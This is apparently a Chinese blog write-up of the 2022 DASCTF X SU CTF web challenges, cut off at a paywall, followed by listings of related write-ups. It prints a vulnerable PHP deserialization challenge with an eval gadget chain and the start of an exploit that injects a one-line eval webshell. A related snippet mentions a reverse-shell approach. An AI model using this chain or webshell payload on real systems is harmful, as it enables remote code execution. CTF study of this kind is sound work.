2022DASCTF X SU 三月春季挑战赛 web复现

原创 已于 2022-11-01 17:38:34 修改 · 1.2k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全

于 2022-06-12 18:23:17 首次发布
本文探讨了PHP中的反序列化漏洞利用,通过示例展示了如何利用`ezpop`类的`eval`函数跳转到`mix`类的`get_flag`方法执行命令。同时,还分析了一个WAF过滤不严的`calc`函数,利用反引号绕过WAF执行`system`函数。最后,讲解了如何通过上传恶意文件在Web环境中执行命令,涉及文件上传、预加载库利用等技巧。

目录

ezpop

Calc:

Upgdstore:

ezpop

<?php

class crow
{
    public $v1;
    public $v2;

    function eval() {
        echo new $this->v1($this->v2);
    }

    public function __invoke()
    {
        $this->v1->world();
    }
}

class fin
{
    public $f1;

    public function __destruct()
    {
        echo $this->f1 . '114514';
    }

    public function run()
    {
        ($this->f1)();
    }

    public function __call($a, $b)
    {
        echo $this->f1->get_flag();
    }

}

class what
{
    public $a;

    public function __toString()
    {
        $this->a->run();
        return 'hello';
    }
}
class mix
{
    public $m1;

    public function run()
    {
        ($this->m1)();
    }

    public function get_flag()
    {
        eval('#' . $this->m1);
    }

}

if (isset($_POST['cmd'])) {
    unserialize($_POST['cmd']);
} else {
    highlight_file(__FILE__);
}

反序列化,修改crow中v1的值,利用crow中的eval跳到mix中,利用eval函数来执行命令。

利用链:

fin::__destruct->what::__toString->fin::_run->crow::__invoke->fin::_call->mix::get_flag

Exp:

<?php



class crow

{

    public $v1;

    public $v2;

    public function __construct()

    {

        $this->v1=new fin();

        $this->v1->f1=new mix();

        $this->v1->f1->m1="?><?=eval(\$_POST[1]);";

    }

}



class fin

{

    public $f1
最低0.47元/天 解锁文章
[2022DASCTF X SU 三月春季挑战赛]calc
weixin_45751765的博客
04-09 2197
0x00 前言 比赛时几乎没看这道题 一方面ssti一直是短板 另一方面upgdstore感觉快出了就想搏一搏… 弥补一下 0x01 brain.md 很常规的计算器 很贴心给了源码 # coding=utf-8 from flask import Flask, render_template, url_for, render_template_string, redirect, request, current_app, session, \ abort, send_from_directory
2022DASCTF X SU 三月春季挑战赛 WriteUp
热门推荐
mumuzi的博客
03-27 1万+
因为这次团队协作较强,所以就把团队wp直接放了(这句话读不懂也没关系,总之放wp) 文章目录Misc月圆之夜 [mumuzi]什么奇奇怪怪的东西 [mumuzi]Hi!Hecker! [mumuzi,dota_st]问卷CryptoFlowerCipher [mumuzi,Lu1u]Reeasyre[Lu1u]IoTWhat's In The Bits[Lu1u,dota_st,mumuzi]Webezpop[atao]calc[atao]upgdstore(赛后)[atao] Misc 月圆之夜 [mu
2022DASCTF X SU 三月春季挑战赛 easyre
Todog的博客
04-06 716
有壳aspack,一般遇到都是upx,网上搜了aspack脱壳工具都没脱成功,使用手脱 手脱aspcak 打开od 下面使用ESP定律法进行脱壳 push压栈了,我们观察到esp中的值变红了,改动了。 在内存窗口中转到 下这个地址下硬件断点 运行软件,断到了。 接着f7 pop出栈,我们发现有个大规模跳转,应该就是oep了 调用api,是oep 准备dump一下 使用Lord Pe 先修正大小,然后dump 这个时候,我...
2022DASCTF X SU三月春季挑战赛 web复现
errorr0
04-20 1721
DASCTF
2022DASCTF X SU 三月春季挑战赛web部分
XINO
03-28 910
简单写一下
2022DASCTF X SU 三月春季挑战赛
m0_56059226的博客
03-27 1085
web ezpop <?php class crow { public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->world(); } } class fin { public $f1; ..
2022DASCTF X SU 三月春季挑战赛 Web部分 WriteUp
weixin_51804748的博客
04-04 4228
ezpop <?php class crow { public $v1; public $v2; function eval() { echo new $this->v1($this->v2); } public function __invoke() { $this->v1->world(); } } class fin { public $f1; public.
DASCTF x SU 2022
as you know, nlp is fantasitc!
03-30 997
目录ez_pop 题calc(复现) ez_pop 题 简单的pop链分析,可以得出如下的一条链 fin:__destruct => what:__toString() => mix:fun => crow:__invoke() => fin:__call =>mix:get_flag 写poc <?php class crow{ public $v1; public $v2; } class fin{ public $f1; } class what{ pu
2022DASCTF X SU 三月春季挑战赛 checkin ROPgadget进阶使用
qq_65147345的博客
07-17 345
1. 栈迁移至bss段 2. 泄露libc地址,将setvbuf改写成puts,将rdi内容改写成read_got,从而泄露libc 3. 再次通过read函数执行system
2022DASCTF X SU 三月春季挑战赛——REVERSE——easyre
qq_39763436的博客
03-31 1023
2022DASCTF X SU 三月春季挑战赛 反序列化之签到题(easyre) 1、使用ExeinfoPe工具查看一下easyre.exe的详细信息,可以看到这个程序加了一个.aspack类型的壳; 2、使用Unpacker_ASPack工具进行自动脱壳,点击Dump,进行脱壳,并另存为; 3、使用较新版本的IDA打开,按F5进行反编译,找到main()函数后,对代码进行分析; 4、这个Destination就是我们需要的,而代码中只有这个函数sub_401771(Destination)用到
2022DASCTF X SU 三月春季挑战赛 checkin 各种脚本学习分析
臭nana的博客
04-03 4831
只能溢出0x10个字节,刚好能够覆盖返回地址,所以得利用栈迁移来做 第一种:利用magic_gadget修改got表中setvbuf的值 在64位程序的_do_global_dtors_aux中有这么一个gadget十分有用,可以直接改栈数据magic_gadget:add dword ptr [rbp - 0x3d], ebx ; nop ; ret 利用read函数溢出,迁移栈到bss段上,然后通过一些小gadget调整寄存器的值来达到目的 出处:2022DASCTFXSU三月春季挑战赛-p
2022DASCTF X SU 三月春季挑战赛checkin(栈迁移,ret2dl)
m0_51251108的博客
09-26 518
ret2dl的复习
2022DASCTF X SU 三月春季挑战赛-reverse-easyre(复现
ookami6497的博客
04-03 1025
先用PE查壳,一开始没看清楚,以为没壳,动调了半天,后来才看到是个ASP壳 用工具脱壳后分析main函数 int __cdecl main(int argc, const char **argv, const char **envp) { _BYTE v4[50]; // [esp+1Ch] [ebp-74h] BYREF _BYTE v5[50]; // [esp+4Eh] [ebp-42h] BYREF _DWORD v6[3]; // [esp+80h] [ebp-10h] BY.
.wav异或提取png 提取blue通道数值并转换写成zip文件(2022DASCTF x SU 三月春季挑战赛 书鱼的秘密)
诚邀网络通信领域商务合作
03-28 3086
文章目录一、.wav异或提取png二、提取blue通道数值并转换写成zip文件三、输入法九键+国际区号解密码 2022DASCTF x SU 三月春季挑战赛 书鱼的秘密 题目wp参考来源: 2022DASCTF x SU 三月春季挑战赛wp–WHT战队 一、.wav异或提取png 从data之后的第二个 k 之后开始,每隔10个字节,有一个字节的数据,其余的都是填充,混淆之类的数据。 把前几个字节提取出来与 233 异或。发现最终结果是png字节流文件尾的逆序。 编写脚本,将这些数据提取出来,异或,然后
DASCTF X SU三月
Re_ly0n的博客
03-27 673
Ezpop 因为疫情学校周末开始补课了,昨天就中午看了看题,做了一个web,挺简单的简单记录下。利用链很好找。说下坑点吧。当用hackerbar传入cmd参数时要使用raw,如下 然后导致我以为是需要原生类进行反序列化。 利用链 fin::__destruct()---->what::__toString()----->fin::run----->crow::__invoke()----->fin::world()----->fin::__call()-----&g
Web2022DASCTF X SU 三月春季挑战赛 题解(全)
最新发布
uuzeray的博客
04-18 958
存在两个命令执行的地方,eval和system,因为waf过于严格,不考虑在eval处利用,可以注释藏恶意代码,用``在system中执行。这disable_functions让人想自杀,过于严格,甚至连不上蚁剑。再去base64解码包含一下,即可用到新的上传逻辑。先修改下上传文件逻辑,把对文件后缀的waf去掉。再回到写的webshell,putenv一下。监听,反弹shell,拿到flag。成功反弹shell,提权,拿flag。先在vps上放一个恶意sh文件。下载恶意sh文件到本地并执行。
2022DASCTF X SU Re WriteUp
Whitebird的博客
04-01 1320
2022DASCTF X SU Re WriteUpeasyreStarGate easyre 一道签到题,老样子先查壳 asp壳比较容易脱,可以百度了解一下,我直接通过ESP定律脱的,然后把内存dump下来用IDA分析 通过字符串定位来到加密函数,下面的v2数组是密文,str数组是我们输入的flag,分析了一下sub_401500、sub_40152B、sub_401593,是一个变种的RC4. 如果是正常RC4,我们可以用脚本或者网站解,变种虽然也可以硬逆,但是比较麻烦。我这里是直接动调出密钥流,R
DASCTF X SU-2022-Crypto-FlowerCipher之暴力暴力求解法(z3约束器)
MangoFengC++
03-27 812
题目 from pickle import LONG1 from secret import flag import random # flag = b'flag{%s}' % md5(something).hexdigest() # note that md5 only have characters 'abcdef' and digits def Flower(x, key): flower = random.randint(0, 4096) return x * (key ** 3
[DASCTF2022]三月月赛WriteUp Web部分全复现
Pysnow's Blog
04-11 3542
Web ezpop ezpop <?php highlight_file(__FILE__); class crow { public $v1; public $v2; function eval() { echo "crow::eval<br>"; echo new $this->v1($this->v2); } public function __invoke() { echo
2022dasctf x su 三月春季挑战赛
03-16
非常感谢您的关注和参与,2022年的DASCTF x SU三月春季挑战赛将会是一场精彩的比赛。我们将会为参赛者提供丰富多彩的挑战,让大家可以在比赛中不断提升自己的技能和能力。希望您能够积极参与,共同创造一个充满挑战和乐趣的比赛。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

f0njl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值